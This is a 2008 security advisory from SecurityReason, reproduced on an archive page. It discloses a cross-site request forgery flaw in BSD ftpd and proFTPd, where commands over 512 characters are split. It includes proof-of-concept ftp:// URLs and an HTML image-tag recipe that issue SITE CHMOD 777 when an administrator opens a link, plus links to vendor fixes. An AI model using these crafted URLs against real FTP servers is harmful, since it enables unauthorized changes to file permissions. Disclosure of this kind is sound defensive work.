AOH :: HP Unsorted M :: VA1398.HTM

multiple vendor ftpd - Cross-site request forgery



multiple vendor ftpd - Cross-site request forgery
multiple vendor ftpd - Cross-site request forgery



-----BEGIN PGP SIGNED MESSAGE-----=0D
Hash: SHA1=0D
=0D
[ multiple vendor ftpd - Cross-site request forgery ]=0D
=0D
Author: Maksymilian Arciemowicz=0D
securityreason.com=0D
Date:=0D
- - Written: 03.09.2008=0D
- - Public: 26.09.2008=0D
=0D
SecurityReason Research=0D
SecurityAlert Id: 56=0D
=0D
CVE: not assigned=0D
SecurityRisk: Low=0D
=0D
Affected Software:=0D
This problem has been discovered on OpenBSD 4.3 .=0D
- - Affected systems:=0D
	+ OpenBSD=0D
	+ NetBSD=0D
	+ FreeBSD=0D
	+ some linux=0D
- - Affected applications:=0D
	+ proFTPd=0D
	+ others=0D
=0D
Advisory URL:=0D
http://securityreason.com/achievement_securityalert/56=0D 
=0D
=0D
- --- 0.Description ---=0D
ftpd -- Internet File Transfer Protocol server=0D
=0D
The ftpd utility is the Internet File Transfer Protocol server process. The server uses the TCP protocol and listens at the port specified with the -P option or in the ``ftp'' service specification; see services(5).=0D
=0D
Cross-site request forgery, also known as one click attack, sidejacking or session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user the website trusts. Contrary to cross-site scripting (XSS), which exploits the trust a user has for a particular site, cross-site request forgery exploits the trust that a site has for a particular user.=0D
=0D
http://en.wikipedia.org/wiki/Cross-site_request_forgery=0D 
=0D
- --- 1. ftpd bsd - Cross-site request forgery ---=0D
The main problem exists in dividing long command for few others. The problem stems from the fact the use of the loop for(;;) and function fgets().=0D
=0D
Example:=0D
Command=0D
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"=0D
=0D
will be split for=0D
=0D
500=0D
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA': command not understood.=0D
500=0D
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'=0D
=0D
=0D
When we try request to ftp deamon via browsers and path is longer 512<, our URL will be split.=0D
=0D
/* FreeBSD 7.0 */=0D
ftp://cxib@127.0.0.1///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST=0D 
=0D
return result from SYST command:=0D
215 UNIX Type: L8 Version: BSD-199506=0D
=0D
=0D
/* NetBSD 4.0 */=0D
ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST=0D 
=0D
return result from SYST command:=0D
215 UNIX Type: L8 Version: NetBSD-ftpd 20080609=0D
=0D
The situation, can be dangerous, when this bug will be exploited like any CSRF attack. We can use SITE CHMOD command to change file permission or other combinations with ftp commands. Only we need some exploit and luck, that admin will executed exploited url.=0D
=0D
How to exploit it?=0D
=0D
0. =0D
Creating some html file with  tags=0D
=0D">src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">=0D 
...=0D
=0D
1.=0D
Give preparing URL for user.=0D
=0D
Example:=0D
ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE=0D 
=0D
will change permision to EXAMPLEFILE when the owner will use this URL.=0D
=0D
I think, it should be some byte, what inform about overflowing (empty command should nulling this byte). We have diagnosed this issue on BSD systems. Unfortunately, we do not know exactly how many machines can be affected.=0D
=0D
- --- 2. How to fix ---=0D
OpenBSD has been first informed. Fix is avalible on cvs:=0D
=0D
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c=0D 
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h=0D 
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y=0D 
=0D
Thanks for OpenBSD Team.=0D
=0D
NetBSD:=0D
http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c=0D 
=0D
proFTPd:=0D
http://bugs.proftpd.org/show_bug.cgi?id=3115=0D 
=0D
SecurityReason has informed only BSD developers and proFTPd Team. =0D
=0D
- --- 3. Greets ---=0D
sp3x infospec p_e_a pi3 schain=0D
=0D
- --- 4. Contact ---=0D
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]=0D
Email: cxib [at] securityreason [dot] com=0D
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg=0D 
http://securityreason.com=0D 
http://securityreason.pl=0D 
=0D
-----BEGIN PGP SIGNATURE-----=0D
Version: GnuPG v1.4.8 (OpenBSD)=0D
=0D
iEYEARECAAYFAkjdBroACgkQpiCeOKaYa9aiFgCfSMm4Pb+2ELGr6WVNWcJHWz+8=0D
3NgAoN6Owug0ezaLFqJ65xyrrDImtX3J=0D
=8Rij=0D
-----END PGP SIGNATURE-----=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.